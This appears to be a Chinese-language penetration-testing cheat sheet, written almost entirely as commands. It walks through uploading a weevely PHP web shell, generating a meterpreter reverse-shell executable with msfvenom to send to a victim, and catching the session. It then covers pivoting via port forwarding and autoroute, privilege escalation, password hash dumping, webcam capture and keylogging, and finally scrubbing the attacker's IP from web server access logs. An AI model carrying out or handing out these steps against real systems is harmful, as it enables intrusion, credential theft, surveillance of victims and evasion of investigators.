上传木马
windows上一般使用菜刀实现一句话木马的控制,在linux平台下,也存在类似的工具,如weevely
使用weevely 生成木马php后上传后再用其连接
weevely generate test hello.php 生成的文件在/usr/share/weevely/hello.php
weevely http://192.168.0.103/DVWA-master/hackable/uploads/hello.php test (weevely URL pass)
使用metersploit
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.201.100 LPORT=6666 -f exe > 6666.exe 生成木马发给肉鸡
主机设置meter脚本
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.201.100
set LPORT 6666
exploit
肉鸡上点击该程序,实现连接
以此为跳板:
链接一个端口
portfwd add -l 2222 -r 192.168.201.101 -p 3389
netstat -an | grep "2222" 验证本地是否开启了监听状态
rdesktop 127.1.1.0:2222 连接上
建立路由
run autoroute -s 192.168.201.101(内网机)
run autoroute -p
getsystem
run hashdump
background 挂起当前会话
接下来可以开始扫描相应端口并测试,使用set RHOST 192.168.201.101
附meterpreter常用命令:
getsystem #会自动利用各种各样的系统漏洞来进行权限提升
migrate #进程id进程迁移
background #把当前的会话设置为背景,需要的时候在启用
getuid #查看对方正在运行的用户
ps #列出所有的进程
getpid #返回运行meterpreter的id号
sysinfo #产看系统信息和体系结构
shell #切换到cmd的系统权限方式
exit #退出shell会话返回meterpreter或终止meterpreter
getdesktop 截取目标主机当前桌面会话窗口
run webcam -p /var/www #在/var/www目录监控目标主机的摄像头
keylog_recorder #使用migrate将会话迁移至explorer.exe的进程空间后记录键盘
观察日志信息
cd /opt/lampp/logs
grep access.log -v 我们的IP -output cleaned.log 过滤网络行为
rm access.log
cp cleaned.log access.log
rm cleaned.log
其他
linux下临时设置IP:ifconfig eth0 192.168.201.100 重启后失效